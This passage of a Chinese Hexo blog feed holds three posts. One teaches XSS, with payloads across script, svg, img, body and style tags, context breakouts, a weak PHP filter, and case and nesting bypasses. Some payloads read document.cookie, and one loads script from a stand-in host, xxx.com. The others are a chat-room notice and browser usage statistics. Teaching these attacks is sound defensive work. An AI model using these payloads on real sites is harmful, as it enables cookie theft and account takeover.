class="line">document.referer</span><br><span class="line">window.name</span><br><span class="line">location</span><br><span class="line">innerHTML</span><br><span class="line">documen.write</span><br></pre></td></tr></table></figure><blockquote><p>然后客户端页面通过js脚本利用DOM的方法获得URL中参数的值，再通过DOM方法赋值给选择列表，该过程没有经过后端，完全是在前端完成的。所以，我们就可以在我们输入的参数上做手脚了。</p></blockquote><p style="color:green">用处：类似于反射型xss</p><p style="color:yellowgreen">姿势：DOM插入</p><p style="color:blue">总结：实用的插入方式，但需要一定“欲望”</p><h1 id="4-0-常见攻击代码"><a href="#4-0-常见攻击代码" class="headerlink" title="4.0 常见攻击代码"></a>4.0 常见攻击代码</h1><p>**注意：以下所有标签的 &gt; 都可以用 // 代替， 例如 <script>alert(1)</script//**（这有利于我之后要说的绕过）</p><h2 id="4-1-script"><a href="#4-1-script" class="headerlink" title="4.1 script"></a>4.1 script</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(<span class="string">&quot;hack&quot;</span>)&lt;/script&gt;   #弹出hack</span><br><span class="line">&lt;script&gt;alert(<span class="regexp">/hack/</span>)&lt;/script&gt;   #弹出hack</span><br><span class="line">&lt;script&gt;alert(<span class="number">1</span>)&lt;/script&gt;        #弹出<span class="number">1</span>，对于数字可以不用引号</span><br><span class="line">&lt;script&gt;alert(<span class="built_in">document</span>.cookie)&lt;/script&gt;      #弹出cookie</span><br><span class="line">&lt;script src=http:<span class="comment">//xxx.com/xss.js&gt;&lt;/script&gt;  #引用外部的xss</span></span><br></pre></td></tr></table></figure><h2 id="4-2-svg"><a href="#4-2-svg" class="headerlink" title="4.2 svg"></a>4.2 svg</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">onload</span>=<span class="string">&quot;alert(1)&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">onload</span>=<span class="string">&quot;alert(1)&quot;</span>//</span></span><br></pre></td></tr></table></figure><h2 id="4-3-img"><a href="#4-3-img" class="headerlink" title="4.3 img"></a>4.3 img</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span>  <span class="attr">src</span>=<span class="string">1</span>  ο<span class="attr">nerr</span>ο<span class="attr">r</span>=<span class="string">alert(</span>&quot;<span class="attr">hack</span>&quot;)&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">img</span>  <span class="attr">src</span>=<span class="string">1</span>  ο<span class="attr">nerr</span>ο<span class="attr">r</span>=<span class="string">alert(document.cookie)</span>&gt;</span>  #弹出cookie</span><br></pre></td></tr></table></figure><h2 id="4-4-body"><a href="#4-4-body" class="headerlink" title="4.4 body"></a>4.4 body</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">body</span> ο<span class="attr">nl</span>ο<span class="attr">ad</span>=<span class="string">alert(1)</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> ο<span class="attr">npagesh</span>ο<span class="attr">w</span>=<span class="string">alert(1)</span>&gt;</span></span><br></pre></td></tr></table></figure><h2 id="4-5-video"><a href="#4-5-video" class="headerlink" title="4.5 video"></a>4.5 video</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">video</span> ο<span class="attr">nl</span>ο<span class="attr">adstart</span>=<span class="string">alert(1)</span> <span class="attr">src</span>=<span class="string">&quot;/media/hack-the-planet.mp4&quot;</span> /&gt;</span></span><br></pre></td></tr></table></figure><h2 id="4-6-style"><a href="#4-6-style" class="headerlink" title="4.6 style"></a>4.6 style</h2><style οnlοad=alert(1)></style><h1 id="5-0-插在哪"><a href="#5-0-插在哪" class="headerlink" title="5.0 插在哪"></a>5.0 插在哪</h1><p>不管是插什么，肯定要知道插在哪，你说对吧，我找到了一串无序列表给大家：</p><ul><li>用户输入作为script标签内容</li><li>用户输入作为HTML注释内容</li><li>用户输入作为HTML标签的属性名</li><li>用户输入作为HTML标签的属性值</li><li>用户输入作为HTML标签的名字</li><li>直接插入到CSS里</li><li>最重要的是，千万不要引入任何不可信的第三方JavaScript到页面里！</li></ul><h1 id="6-0-进阶插入"><a href="#6-0-进阶插入" class="headerlink" title="6.0 进阶插入"></a>6.0 进阶插入</h1><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#用户输入作为HTML注释内容，导致攻击者可以进行闭合绕过</span><br><span class="line"><span class="comment">&lt;!-- 用户输入 --&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- --&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="comment">&lt;!-- --&gt;</span></span><br><span class="line"></span><br><span class="line">#用户输入作为标签属性名，导致攻击者可以进行闭合绕过</span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> 用户输入=<span class="string">&quot;xx&quot;</span>&gt;</span>  <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> &gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;<span class="name">div</span> <span class="attr">a</span>=<span class="string">&quot;xx&quot;</span>&gt;</span> <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line">#用户输入作为标签属性值，导致攻击者可以进行闭合绕过</span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">&quot;用户输入&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">&quot;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;<span class="name">div</span> <span class="attr">a</span>=<span class="string">&quot;x&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line">#用户输入作为标签名，导致攻击者可以进行闭合绕过</span><br><span class="line">&lt;用户输入  id=&quot;xx&quot; /&gt;</span><br><span class="line"><span class="tag">&lt;&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;<span class="name">b</span> <span class="attr">id</span>=<span class="string">&quot;xx&quot;</span> /&gt;</span></span><br><span class="line"></span><br><span class="line">#用户输入作为CSS内容，导致攻击者可以进行闭合绕过</span><br><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="xml">用户输入<span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="xml"></span></span></span><br><span class="line"><span class="xml"><span class="xml"><span class="tag">&lt;<span class="name">style</span>&gt;</span> </span></span><span class="tag">&lt;/<span class="name">style</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;<span class="name">style</span>&gt;</span> <span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure><h1 id="7-0-过滤"><a href="#7-0-过滤" class="headerlink" title="7.0 过滤"></a>7.0 过滤</h1><p>这里不多说，看过我之前博客的应该知道：</p><p><a href="https://whitegeeker.github.io/2022/01/19/%E4%B8%AD%E5%9B%BD%E6%94%BF%E5%BA%9C%E7%BD%91%E7%AB%99%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8xss%E6%BC%8F%E6%B4%9E/">传送门</a></p><h1 id="8-0-绕过"><a href="#8-0-绕过" class="headerlink" title="8.0 绕过"></a>8.0 绕过</h1><blockquote><p>我们知道道高一尺魔高一丈，即使有网站是开了过滤，我们还是有办法绕过这些过滤，这个过程即“绕过”</p></blockquote><p>这里只是点一下，重点是<strong>姿势和实战</strong>（因为我们要紧扣主题），我把一个demo给大家看下就明白了：</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">//前端 1.html：</span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>反射型XSS<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;action4.php&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;name&quot;</span> /&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;提交&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//后端 action4.php：</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$name</span>=<span class="variable">$_POST</span>[<span class="string">&quot;name&quot;</span>]; </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$name</span>!=<span class="literal">null</span>)&#123;</span><br><span class="line"><span class="variable">$name</span>=preg_replace(<span class="string">&quot;/&lt;script&gt;/&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="variable">$name</span>);      <span class="comment">//过滤&lt;script&gt;</span></span><br><span class="line"><span class="variable">$name</span>=preg_replace(<span class="string">&quot;/&lt;\/script&gt;/&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="variable">$name</span>);   <span class="comment">//过滤&lt;/script&gt;</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$name</span>; </span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure><p>再教大家两个小技巧：</p><p><strong>1.我们可以通过大小写来绕过</strong>：</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">scripT</span>&gt;</span><span class="javascript">alert(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">scripT</span>&gt;</span></span><br></pre></td></tr></table></figure><p><strong>2.我们可以嵌套</strong>：</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scr<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">ipt&gt;alert(<span class="string">&#x27;hack&#x27;</span>)&lt;/scr</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>ipt&gt;</span><br></pre></td></tr></table></figure><h1 id="9-0-实战"><a href="#9-0-实战" class="headerlink" title="9.0 实战"></a>9.0 实战</h1><p>这里有一个测试平台：</p><p><a href="https://imgtu.com/i/7LJMdA"><img src="https://s4.ax1x.com/2022/01/26/7LJMdA.png" alt="7LJMdA.png"></a></p><p>实战过程：</p><p><a href="https://imgtu.com/i/7LJGz8"><img src="https://s4.ax1x.com/2022/01/26/7LJGz8.md.png" alt="7LJGz8.md.png"></a><br><a href="https://imgtu.com/i/7LJYQS"><img src="https://s4.ax1x.com/2022/01/26/7LJYQS.md.png" alt="7LJYQS.md.png"></a></p><p>这里只是简单展示了一下xss攻击，如果看不清可以<del>听</del>我说：</p><p>这里有一个div标签，我在div嵌套了一个基本姿势：</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><p>记住，如果是数字可以不用加双引号</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;1-0-前言&quot;&gt;&lt;a href=&quot;#1-0-前言&quot; class=&quot;headerlink&quot; title=&quot;1.0 前言&quot;&gt;&lt;/a&gt;1.0 前言&lt;/h1&gt;&lt;p&gt;&lt;a href=&quot;https://imgtu.com/i/7fOl6J&quot;&gt;&lt;img src=&quot;https:/</summary>
      
    
    
    
    <category term="攻防" scheme="http://example.com/categories/%E6%94%BB%E9%98%B2/"/>
    
    
    <category term="xss" scheme="http://example.com/tags/xss/"/>
    
  </entry>
  
  <entry>
    <title>聊天室</title>
    <link href="http://example.com/2022/01/21/%E8%81%8A%E5%A4%A9%E5%AE%A4/"/>
    <id>http://example.com/2022/01/21/%E8%81%8A%E5%A4%A9%E5%AE%A4/</id>
    <published>2022-01-21T05:45:26.000Z</published>
    <updated>2022-01-26T07:27:42.720Z</updated>
    
    <content type="html"><![CDATA[<h1 id="1-0-注意事项"><a href="#1-0-注意事项" class="headerlink" title="1.0 注意事项"></a>1.0 注意事项</h1><p>1.必须先注册一个github账号</p><p>2.禁止发违反国家法律法规的信息，一经发现，立刻删除或者隐藏评论（我这里可以管理评论后台）</p><h1 id="2-0-结语"><a href="#2-0-结语" class="headerlink" title="2.0 结语"></a>2.0 结语</h1><p>畅所欲言吧</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;1-0-注意事项&quot;&gt;&lt;a href=&quot;#1-0-注意事项&quot; class=&quot;headerlink&quot; title=&quot;1.0 注意事项&quot;&gt;&lt;/a&gt;1.0 注意事项&lt;/h1&gt;&lt;p&gt;1.必须先注册一个github账号&lt;/p&gt;
&lt;p&gt;2.禁止发违反国家法律法规的信息，一经发现</summary>
      
    
    
    
    <category term="工具" scheme="http://example.com/categories/%E5%B7%A5%E5%85%B7/"/>
    
    
    <category term="其它" scheme="http://example.com/tags/%E5%85%B6%E5%AE%83/"/>
    
  </entry>
  
  <entry>
    <title>关于日常前端开发的那些坑</title>
    <link href="http://example.com/2022/01/20/%E5%85%B3%E4%BA%8E%E6%97%A5%E5%B8%B8%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91%E7%9A%84%E9%82%A3%E4%BA%9B%E5%9D%91/"/>
    <id>http://example.com/2022/01/20/%E5%85%B3%E4%BA%8E%E6%97%A5%E5%B8%B8%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91%E7%9A%84%E9%82%A3%E4%BA%9B%E5%9D%91/</id>
    <published>2022-01-20T09:59:35.000Z</published>
    <updated>2022-01-20T10:11:10.236Z</updated>
    
    <content type="html"><![CDATA[<h1 id="1-0-问"><a href="#1-0-问" class="headerlink" title="1.0 问"></a>1.0 问</h1><p>下面是来自A稽的朋友提交的问题：</p><p><a href="https://imgtu.com/i/7cJ34K"><img src="https://s4.ax1x.com/2022/01/20/7cJ34K.png" alt="7cJ34K.png"></a></p><h1 id="2-0-答"><a href="#2-0-答" class="headerlink" title="2.0 答"></a>2.0 答</h1><p>我的回答是：</p><p><a href="https://imgtu.com/i/7cJLr9"><img src="https://s4.ax1x.com/2022/01/20/7cJLr9.png" alt="7cJLr9.png"></a></p><p><strong>唔？body嵌入式都不行？</strong></p><h1 id="3-0-解决方案"><a href="#3-0-解决方案" class="headerlink" title="3.0 解决方案"></a>3.0 解决方案</h1><p><strong>建议下载Firefox或chrome，虽然日常很少去对比哪个好，但是如果你要开发前端的话，不建议用别的浏览器</strong></p><p>我这里有一点简介供大家参考</p><table><thead><tr><th><img src="https://www.runoob.com/images/pic_ie.png" alt="Explorer"></th><th><a href="https://www.runoob.com/browsers/browsers-explorer.html">Internet Explorer（IE浏览器）</a> Internet Explorer（IE浏览器）是微软公司（Microsoft）发行的一款 web 浏览器。 它发布于 1995 年，是当今最流行的浏览器之一。</th></tr></thead><tbody><tr><td></td><td></td></tr></tbody></table><table><thead><tr><th><img src="https://www.runoob.com/wp-content/uploads/2013/07/pic_edge.png" alt="Explorer"></th><th align="left"><a href="https://www.microsoft.com/en-us/edge">Microsoft Edge 浏览器</a> 微软新一代浏览器。 微软新的 IE 浏览器项目 Project Spartan 在 Build 2015 上正式更名为 Microsoft Edge。最新的 Edge 采用了 Chromium 内核，当然也兼容以前 IE 的功能。</th></tr></thead><tbody><tr><td></td><td align="left"></td></tr></tbody></table><table><thead><tr><th><img src="https://www.runoob.com/images/pic_chrome.gif" alt="Chrome"></th><th><a href="https://www.runoob.com/browsers/browsers-chrome.html">Google Chrome（谷歌浏览器）</a> Google Chrome（谷歌浏览器）是由 Google 公司开发一款开源免费的 web 浏览器。它发布于 2008 年，是当今最常用的浏览器。</th></tr></thead><tbody><tr><td></td><td></td></tr></tbody></table><table><thead><tr><th><img src="https://www.runoob.com/images/pic_firefox.png" alt="Firefox"></th><th><a href="https://www.runoob.com/browsers/browsers-firefox.html">Firefox（火狐浏览器）</a> Firefox（火狐浏览器）是来自 Mozilla 的一款 web 浏览器。它发布于 2004 年，也是当今最流行的浏览器之一。</th></tr></thead><tbody><tr><td></td><td></td></tr></tbody></table><table><thead><tr><th><img src="https://www.runoob.com/images/pic_safari.gif" alt="Safari"></th><th><a href="https://www.runoob.com/browsers/browsers-safari.html">Apple Safari（苹果 Safari 浏览器）</a> Safari 是由苹果公司开发的一款 web 浏览器，它是 Mac 系统的默认浏览器。Safari 以其时尚的设计而著称。</th></tr></thead><tbody><tr><td></td><td></td></tr></tbody></table><table><thead><tr><th><img src="https://www.runoob.com/images/pic_opera.gif" alt="Opera"></th><th><a href="https://www.runoob.com/browsers/browsers-opera.html">Opera 浏览器</a> Opera 是挪威人发明的一款 web 浏览器。它以下列特性而闻名于世：快速小巧、符合工业标准、适用于多种操作系统。对于一系列小型设备诸如手机和掌上电脑来说，Opera 无疑是首选的浏览器。</th></tr></thead><tbody><tr><td></td><td></td></tr></tbody></table><table><thead><tr><th><img src="https://www.runoob.com/images/pic_mozilla.png" alt="Mozilla"></th><th><a href="https://www.runoob.com/browsers/browsers-mozilla.html">Mozilla 项目</a> Mozilla 项目是从 Netscape 的基础上发展起来的。今天，基于 Mozilla 的浏览器已经演变为互联网上最大的浏览器家族。</th></tr></thead><tbody><tr><td></td><td></td></tr></tbody></table><table><thead><tr><th><img src="https://www.runoob.com/images/pic_netscape.gif" alt="Netscape"></th><th><a href="https://www.runoob.com/browsers/browsers-netscape.html">Netscape 浏览器</a> Netscape 是首个商业化的 web 浏览器。它发布于 1994 年。在 IE 的竞争下，Netscape 逐渐丧失了它的市场份额。Netscape 的官方开发结束于 2008 年 2 月。</th></tr></thead><tbody><tr><td></td><td></td></tr></tbody></table><table><thead><tr><th align="left">2016</th><th align="right"><a href="https://www.runoob.com/browsers/browsers-chrome.html">Chrome</a></th><th align="right"><a href="https://www.runoob.com/browsers/browsers-explorer.html">360 安全浏览器</a></th><th align="right"><a href="https://www.runoob.com/browsers/browsers-firefox.html">Firefox</a></th><th align="right"><a href="https://www.runoob.com/browsers/browsers-safari.html">Safari</a></th></tr></thead><tbody><tr><td align="left">1 月</td><td align="right">44.46%</td><td align="right">14.43%</td><td align="right">13.63%</td><td align="right">2.59%</td></tr><tr><td align="left">2 月</td><td align="right">47.16%</td><td align="right">11.22%</td><td align="right">15.13%</td><td align="right">3.31%</td></tr><tr><td align="left">3 月</td><td align="right">41.25%</td><td align="right">16.21%</td><td align="right">12.29%</td><td align="right">2.81%</td></tr><tr><td align="left">4 月</td><td align="right">41.25%</td><td align="right">16.21%</td><td align="right">12.29%</td><td align="right">2.81%</td></tr><tr><td align="left">5 月</td><td align="right">43.28%</td><td align="right">14.7%</td><td align="right">13.99%</td><td align="right">2.61%</td></tr><tr><td align="left">6 月</td><td align="right">44.14%</td><td align="right">16.21%</td><td align="right">12.29%</td><td align="right">2.64%</td></tr><tr><td align="left">7 月</td><td align="right">44.88%</td><td align="right">14.62%</td><td align="right">14.14%</td><td align="right">2.49%</td></tr><tr><td align="left">8 月</td><td align="right">45.42%</td><td align="right">14.23%</td><td align="right">14.15%</td><td align="right">2.45%</td></tr><tr><td align="left">9 月</td><td align="right">45.08%</td><td align="right">14.01%</td><td align="right">13.56%</td><td align="right">2.56%</td></tr><tr><td align="left">10 月</td><td align="right">44.85%</td><td align="right">14.33%</td><td align="right">12.96%</td><td align="right">2.67%</td></tr><tr><td align="left">11 月</td><td align="right">46.02%</td><td align="right">14.13%</td><td align="right">13.12%</td><td align="right">2.71%</td></tr><tr><td align="left">12 月</td><td align="right">46.42%</td><td align="right">14.16%</td><td align="right">12.42%</td><td align="right">2.55%</td></tr></tbody></table><table><thead><tr><th align="left">日期</th><th align="right"><a href="https://www.runoob.com/browsers/browsers-resolution-higher.html">更高</a></th><th align="right">1920x1080</th><th align="right">1366x768</th><th align="right">1280x1024</th><th align="right">1280x800</th><th align="right">1024x768</th><th align="right">800x600</th><th align="right">更低</th></tr></thead><tbody><tr><td align="left">2014 年 1 月</td><td align="right">34%</td><td align="right">13%</td><td align="right">31%</td><td align="right">8%</td><td align="right">7%</td><td align="right">6%</td><td align="right">0.5%</td><td align="right">0.5%</td></tr><tr><td align="left">2013 年 1 月</td><td align="right">36%</td><td align="right">11%</td><td align="right">25%</td><td align="right">10%</td><td align="right">8%</td><td align="right">9%</td><td align="right">0.5%</td><td align="right">0.5%</td></tr><tr><td align="left">2012 年 1 月</td><td align="right">35%</td><td align="right">8%</td><td align="right">19%</td><td align="right">12%</td><td align="right">11%</td><td align="right">13%</td><td align="right">1%</td><td align="right">1%</td></tr><tr><td align="left">2011 年 1 月</td><td align="right">50%</td><td align="right">6%</td><td align="right"></td><td align="right">15%</td><td align="right">14%</td><td align="right">14%</td><td align="right">0%</td><td align="right">1%</td></tr><tr><td align="left">2010 年 1 月</td><td align="right">39%</td><td align="right">2%</td><td align="right"></td><td align="right">18%</td><td align="right">17%</td><td align="right">20%</td><td align="right">1%</td><td align="right">3%</td></tr><tr><td align="left">2009 年 1 月</td><td align="right">57%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">36%</td><td align="right">4%</td><td align="right">3%</td></tr><tr><td align="left">2008 年 1 月</td><td align="right">38%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">48%</td><td align="right">8%</td><td align="right">6%</td></tr><tr><td align="left">2007 年 1 月</td><td align="right">26%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">54%</td><td align="right">14%</td><td align="right">6%</td></tr><tr><td align="left">2006 年 1 月</td><td align="right">17%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">57%</td><td align="right">20%</td><td align="right">6%</td></tr><tr><td align="left">2005 年 1 月</td><td align="right">12%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">53%</td><td align="right">30%</td><td align="right">5%</td></tr><tr><td align="left">2004 年 1 月</td><td align="right">10%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">47%</td><td align="right">37%</td><td align="right">6%</td></tr><tr><td align="left">2003 年 1 月</td><td align="right">6%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">40%</td><td align="right">47%</td><td align="right">7%</td></tr><tr><td align="left">2002 年 1 月</td><td align="right">6%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">34%</td><td align="right">52%</td><td align="right">8%</td></tr><tr><td align="left">2001 年 1 月</td><td align="right">5%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">29%</td><td align="right">55%</td><td align="right">11%</td></tr><tr><td align="left">2000 年 1 月</td><td align="right">4%</td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right"></td><td align="right">25%</td><td align="right">56%</td><td align="right">15%</td></tr></tbody></table><p>颜色深度统计</p><p>今天，大多数计算机使用 24 位或 32 位硬件来显示 16,777,216 种不同的颜色。</p><p>较旧的计算机使用 16 位显卡，它最多能显示 65,536 种不同的颜色。</p><p>很旧的计算机使用 8 位显卡，它最多能显示 256 种不同的颜色。</p><table><thead><tr><th align="left">日期</th><th align="right">16,777,216</th><th align="right">65,536</th><th align="right">256</th></tr></thead><tbody><tr><td align="left">2014 年 1 月</td><td align="right">98.5%</td><td align="right">1%</td><td align="right">0.5%</td></tr><tr><td align="left">2013 年 1 月</td><td align="right">98%</td><td align="right">1.5%</td><td align="right">0.5%</td></tr><tr><td align="left">2012 年 1 月</td><td align="right">98%</td><td align="right">2%</td><td align="right">0%</td></tr><tr><td align="left">2011 年 1 月</td><td align="right">97%</td><td align="right">3%</td><td align="right">0%</td></tr><tr><td align="left">2010 年 1 月</td><td align="right">97%</td><td align="right">3%</td><td align="right">0%</td></tr><tr><td align="left">2009 年 1 月</td><td align="right">95%</td><td align="right">4%</td><td align="right">1%</td></tr><tr><td align="left">2008 年 1 月</td><td align="right">90%</td><td align="right">8%</td><td align="right">2%</td></tr><tr><td align="left">2007 年 1 月</td><td align="right">86%</td><td align="right">11%</td><td align="right">2%</td></tr><tr><td align="left">2006 年 1 月</td><td align="right">81%</td><td align="right">16%</td><td align="right">3%</td></tr><tr><td align="left">2005 年 1 月</td><td align="right">72%</td><td align="right">25%</td><td align="right">3%</td></tr><tr><td align="left">2004 年 1 月</td><td align="right">65%</td><td align="right">31%</td><td align="right">4%</td></tr><tr><td align="left">2003 年 1 月</td><td align="right">51%</td><td align="right">44%</td><td align="right">5%</td></tr><tr><td align="left">2002 年 1 月</td><td align="right">43%</td><td align="right">50%</td><td align="right">7%</td></tr><tr><td align="left">2001 年 1 月</td><td align="right">37%</td><td align="right">55%</td><td align="right">8%</td></tr><tr><td align="left">2000 年 1 月</td><td align="right">34%</td><td align="right">54%</td><td align="right">12%</td></tr></tbody></table><p>下表是 <a href="https://www.runoob.com/browsers/browsers-os.html">操作系统统计</a> 中关于移动设备使用情况的细节：</p><table><thead><tr><th align="left">2014</th><th align="left">总计</th><th align="left">iOS *</th><th align="left">Android（安卓）</th><th align="left">其他</th></tr></thead><tbody><tr><td align="left">5 月</td><td align="left">4.16 %</td><td align="left">1.27 %</td><td align="left">2.14 %</td><td align="left">0.75 %</td></tr><tr><td align="left">4 月</td><td align="left">4.03 %</td><td align="left">1.20 %</td><td align="left">2.10 %</td><td align="left">0.73 %</td></tr><tr><td align="left">3 月</td><td align="left">4.00 %</td><td align="left">1.32 %</td><td align="left">2.01 %</td><td align="left">0.67 %</td></tr><tr><td align="left">2 月</td><td align="left">4.00 %</td><td align="left">1.21 %</td><td align="left">2.01 %</td><td align="left">0.78 %</td></tr><tr><td align="left">1 月</td><td align="left">4.00 %</td><td align="left">1.23 %</td><td align="left">1.93 %</td><td align="left">0.84 %</td></tr><tr><td align="left">2013</td><td align="left">总计</td><td align="left">iOS *</td><td align="left">Android（安卓）</td><td align="left">其他</td></tr><tr><td align="left">12 月</td><td align="left">3.80 %</td><td align="left">1.13 %</td><td align="left">1.76 %</td><td align="left">0.91 %</td></tr><tr><td align="left">11 月</td><td align="left">3.68 %</td><td align="left">1.20 %</td><td align="left">1.67 %</td><td align="left">0.81 %</td></tr><tr><td align="left">10 月</td><td align="left">3.29 %</td><td align="left">1.12 %</td><td align="left">1.44 %</td><td align="left">0.73 %</td></tr><tr><td align="left">9 月</td><td align="left">3.26 %</td><td align="left">0.95 %</td><td align="left">1.55 %</td><td align="left">0.76 